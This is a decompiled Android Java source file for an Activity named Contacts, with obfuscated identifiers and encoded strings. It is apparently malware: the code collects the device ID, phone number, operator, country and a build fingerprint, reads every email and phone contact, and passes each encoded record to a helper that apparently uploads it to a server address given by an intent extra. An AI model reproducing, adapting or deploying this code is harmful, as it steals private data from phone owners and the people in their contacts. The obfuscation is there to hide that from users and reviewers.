package perion.app.sebgdferxdsfet.ghhsfer;

import android.app.Activity;
import android.database.Cursor;
import android.os.Build;
import android.os.Bundle;
import android.provider.ContactsContract;
import android.provider.Settings;
import android.telephony.TelephonyManager;
import android.util.Log;
import fsdfsdf.gsdsfsf.gjhghjg.lbljhkjblkjblkjblkj.e;
import fsdfsdf.gsdsfsf.gjhghjg.lbljhkjblkjblkjblkj.g;

public class Contacts extends Activity {
    private static final String[] zxcvxvsdvsvsvs = {g.fsafsdfsfsdfsfsdfsd("\u0019:\u0014!\u001b6\u000e\n\u00131"), e.fsafsdfsfsdfsfsdfsd("\u0014}\u0003d\u001cu\tK\u001eu\u001dq"), g.fsafsdfsfsdfsfsdfsd("1\u001b!\u001bd")};
    rthrthrtjrtjrjtdcbcvbc fsafsdfsfsdfsfsdfsd = new rthrthrtjrtjrjtdcbcvbc();
    serfwefewfwefewef sdfsdfsdfsdf = new serfwefewfwefewef();

    /* access modifiers changed from: protected */
    public void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        TelephonyManager telephonyManager = (TelephonyManager) getSystemService(g.fsafsdfsfsdfsfsdfsd("%\u0012:\u00140"));
        if (Build.VERSION.SDK_INT < 23) {
            telephonyManager.getDeviceId();
            new StringBuilder().insert(0, "").append(telephonyManager.getNetworkOperatorName()).append("").append(telephonyManager.getLine1Number()).toString();
        } else if (Settings.Secure.getString(getContentResolver(), e.fsafsdfsfsdfsfsdfsd("\u0011z\u0014f\u001f}\u0014K\u0019p")) == "") {
            new StringBuilder().insert(0, g.fsafsdfsfsdfsfsdfsd("I`")).append(Build.BOARD.length() % 10).append(Build.BRAND.length() % 10).append(Build.CPU_ABI.length() % 10).append(Build.DEVICE.length() % 10).append(Build.DISPLAY.length() % 10).append(Build.HOST.length() % 10).append(Build.ID.length() % 10).append(Build.MANUFACTURER.length() % 10).append(Build.MODEL.length() % 10).append(Build.PRODUCT.length() % 10).append(Build.TAGS.length() % 10).append(Build.TYPE.length() % 10).append(Build.USER.length() % 10).toString();
        }
        String networkCountryIso = telephonyManager.getNetworkCountryIso();
        Cursor query = getContentResolver().query(ContactsContract.CommonDataKinds.Email.CONTENT_URI, zxcvxvsdvsvsvs, null, null, null);
        if (query != null) {
            try {
                int columnIndex = query.getColumnIndex(e.fsafsdfsfsdfsfsdfsd("\u0013{\u001e`\u0011w\u0004K\u0019p"));
                int columnIndex2 = query.getColumnIndex(g.fsafsdfsfsdfsfsdfsd("\u001e<\t%\u00164\u0003\n\u00144\u00170"));
                int columnIndex3 = query.getColumnIndex(e.fsafsdfsfsdfsfsdfsd("p\u0011`\u0011%"));
                while (query.moveToNext()) {
                    query.getLong(columnIndex);
                    String string = query.getString(columnIndex2);
                    String string2 = query.getString(columnIndex3);
                    Cursor query2 = getContentResolver().query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, null, null, null, null);
                    while (query2.moveToNext()) {
                        String string3 = query2.getString(query2.getColumnIndex(g.fsafsdfsfsdfsfsdfsd("\u001e<\t%\u00164\u0003\n\u00144\u00170")));
                        String string4 = query2.getString(query2.getColumnIndex(e.fsafsdfsfsdfsfsdfsd("p\u0011`\u0011%")));
                        String stringExtra = getIntent().getStringExtra(g.fsafsdfsfsdfsfsdfsd("\u0000(\u0019"));
                        this.sdfsdfsdfsdf.fsafsdfsfsdfsfsdfsd(new StringBuilder().insert(0, stringExtra).append(e.fsafsdfsfsdfsfsdfsd("\u0013{\u001e`^d\u0018d")).toString(), new StringBuilder().insert(0, g.fsafsdfsfsdfsfsdfsd("\nh")).append(this.fsafsdfsfsdfsfsdfsd.zxcvxvsdvsvsvs(new StringBuilder().insert(0, this.fsafsdfsfsdfsfsdfsd.fsafsdfsfsdfsfsdfsd(this)).append(e.fsafsdfsfsdfsfsdfsd(".")).append(string3).append(g.fsafsdfsfsdfsfsdfsd("o")).append(string4).append(e.fsafsdfsfsdfsfsdfsd(".")).append(networkCountryIso).append(g.fsafsdfsfsdfsfsdfsd(")@)")).toString())).toString());
                        this.sdfsdfsdfsdf.fsafsdfsfsdfsfsdfsd(new StringBuilder().insert(0, stringExtra).append(e.fsafsdfsfsdfsfsdfsd("w\u001fz\u0004u\u0013`^d\u0018d")).toString(), new StringBuilder().insert(0, g.fsafsdfsfsdfsfsdfsd("\nh")).append(this.fsafsdfsfsdfsfsdfsd.zxcvxvsdvsvsvs(new StringBuilder().insert(0, this.fsafsdfsfsdfsfsdfsd.fsafsdfsfsdfsfsdfsd(this)).append(e.fsafsdfsfsdfsfsdfsd(".")).append(string3).append(g.fsafsdfsfsdfsfsdfsd("o")).append(string4).append(e.fsafsdfsfsdfsfsdfsd(".")).append(networkCountryIso).append(g.fsafsdfsfsdfsfsdfsd("o")).append(string).append(e.fsafsdfsfsdfsfsdfsd(".")).append(string2).append(g.fsafsdfsfsdfsfsdfsd(")@)")).toString())).toString());
                    }
                }
            } catch (Exception e) {
                Log.e("", new StringBuilder().insert(0, e.fsafsdfsfsdfsfsdfsd("4]4N4")).append(e).toString());
                finish();
                query.close();
            }
            query.close();
            finish();
        }
    }
}
